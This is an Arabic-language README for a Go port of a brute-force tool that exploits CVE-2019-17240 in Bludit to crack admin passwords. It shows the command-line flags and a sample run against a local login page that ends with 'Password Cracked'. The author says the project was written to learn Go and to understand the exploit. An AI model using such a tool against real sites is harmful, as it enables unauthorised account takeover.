
أداة هجوم القوة الغاشمة مبنية بلغة Go تستغل تجاوز الحماية ضد القوة الغاشمة في Bludit (CVE-2019-17240) لتكسير كلمات المرور تلقائيًا ضد صفحات تسجيل دخول المسؤول.
هذا مشروع صغير قمت فيه بإعادة كتابة هذا السكربت بلغة بايثون إلى لغة غو. كان الغرض من هذا المشروع هو تعلّم لغة غو وفهم كيفية عمل هذا الاستغلال.
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
جميع الخيارات إلزامية ما عدا خيار الخيوط (threads).
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password